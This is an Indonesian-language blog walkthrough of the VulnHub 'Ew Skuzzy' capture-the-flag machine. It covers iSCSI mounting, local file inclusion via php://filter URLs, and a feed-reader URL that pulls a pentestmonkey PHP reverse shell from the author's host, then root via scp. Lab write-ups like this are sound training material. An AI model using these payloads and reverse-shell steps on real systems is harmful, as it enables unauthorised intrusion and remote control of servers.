Ew Skuzzy! CTF Walkthrough

77.png

Langkah pertama adalah mencari celah dengan nmap

1
sekarang terlihat bahwa port yang terbuka adalah 22, 80 dan 3260.

2.png

port 80 (http) dan tidak ada apa-apa disini, kemudian lanjut ke port 3260.

Skip—

Port 3260 (iSCSI)

3.png

Pertanyaannya, apa sih iSCSI?

iSCSI (Internet Small Computer System Interface) adalah  media penyimpanan menggunakan internet protokol  sebagai penghubung antara storage dengan server (komputer), dengan kata lain iSCSI digunakan untuk menghubungkan hard disk beserta transfer data melalui jaringan internet maupun intranet. Sumber

Untuk mengeksploitasi port 3260 silahkan install terlebih dahulu iSCSI Initiator kemudian sedikit konfigurasi pada file /etc/iscsi/iscsid.conf (Selengkapnya : https://help.ubuntu.com/lts/serverguide/iscsi-initiator.html)

4

/dev/sdc/ adalah media penyimpanan Vuln-VM yang bisa di-mount. saya mount ke direktori /skuzzy (yang telah saya buat sebelumnya) kemudian untuk melihat isinya.

5

…dan insinya adalah flag pertama.

skip–

di dalam mounted folder tadi terdapat juga file boobsdisk.dsk yang dapat di cek

5

ToAlice.eml terdapat flag kedua dan sebuah clue untuk membuka ToAlice.eml.enc

61.png

Untuk mendapatkan file ToAlice.csv saya men-decrypt file ToAlice.csv,enc (passwordnya ada didalam clue)

di dalam ToAlice.csv terdapat flag ketiga dan dua web path yang dapat diakses.

http://ip-target/5560a1468022758dba5e92ac8f2353c0

7.png

di sini saya melihat source code dan menemukan teks yang terenskripsi (base64) namun tidak menemukan flag.

8

teks yang sudah di decode

George Costanza: [Soup Nazi gives him a look] Medium turkey chili. 
[instantly moves to the cashier] 
Jerry Seinfeld: Medium crab bisque. 
George Costanza: [looks in his bag and notices no bread in it] I didn't get any bread. 
Jerry Seinfeld: Just forget it. Let it go. 
George Costanza: Um, excuse me, I - I think you forgot my bread. 
Soup Nazi: Bread, $2 extra. 
George Costanza: $2? But everyone in front of me got free bread. 
Soup Nazi: You want bread? 
George Costanza: Yes, please. 
Soup Nazi: $3! 
George Costanza: What? 
Soup Nazi: NO FLAG FOR YOU

 

http://ip-target/c2444910794e037ebd8aaf257178c90b

10

Situs ini memiliki celah LFI terlihat pada parameter ?p=

dan juga http://ip=target/c2444910794e037ebd8aaf257178c90b/?p=reader&url=http://127.0.0.1/c2444910794e037ebd8aaf257178c90b/data.txt pada link Feed Reader

Saya rubah paramaternya dan mengubah loopback ke ip target
http://ip-target/c2444910794e037ebd8aaf257178c90b/data.txt

Output

text##
This is some example source data for my nice little feed reader. I have designed my own nice little format which will allow it to include dynamic content. Who needs consultants when it's this easy? :) 
One of the best things is this will allow me to host my feed content to display on this page on an external server! So flexible :D
##text##

##php##
print("See? This is totally dynamic, generated by PHP right in my own little tool. Hacker proof, too, because there is a secret key required!");
##php##

Download flag.php yang kemudian saya decode (base64)

http://ip-target/c2444910794e037ebd8aaf257178c90b/?p=php://filter/convert.base64-encode/resource=flag.php

 

14flag4

Download reader.php source

http://ip-target/c2444910794e037ebd8aaf257178c90b/?p=php://filter/convert.base64-encode/resource=reader.php

15.png

dari kode di atas diketahui, untuk mendapatkan shell harus ada key (47 char) dan flag keempat adalah hint flag selanjutnya (shell) flag4{4e44db0f1edc3c361dbf54eaf4df40352db91f8b}

skip–

gunakan php reverse ini (https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php) dan copy ke direktori web server

16

ubah ip host, port dan ganti tag <?php > dengan ##php## simpan dengan nama data.txt

17

buka url

http://ip-target/c2444910794e037ebd8aaf257178c90b/?p=reader&key=flag44e44db0f1edc3c361dbf54eaf4df40352db91f8b&url=http://ip-saya/data.txt

18

mendapatkan root privilege menggunakan scp command (alicebackup)

20.png

21

flag kelima

22.png

Links:

https://www.vulnhub.com/entry/ew_skuzzy-1,184/

https://ryanoberto.github.io/blog/2017/03/28/ew-skuzzy-ctf-walkthrough/

https://help.ubuntu.com/lts/serverguide/iscsi-initiator.html

https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php

http://touhidshaikh.com/blog/walkthrough/ew_skuzzy-walktrough-vulnhub/

 

 

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s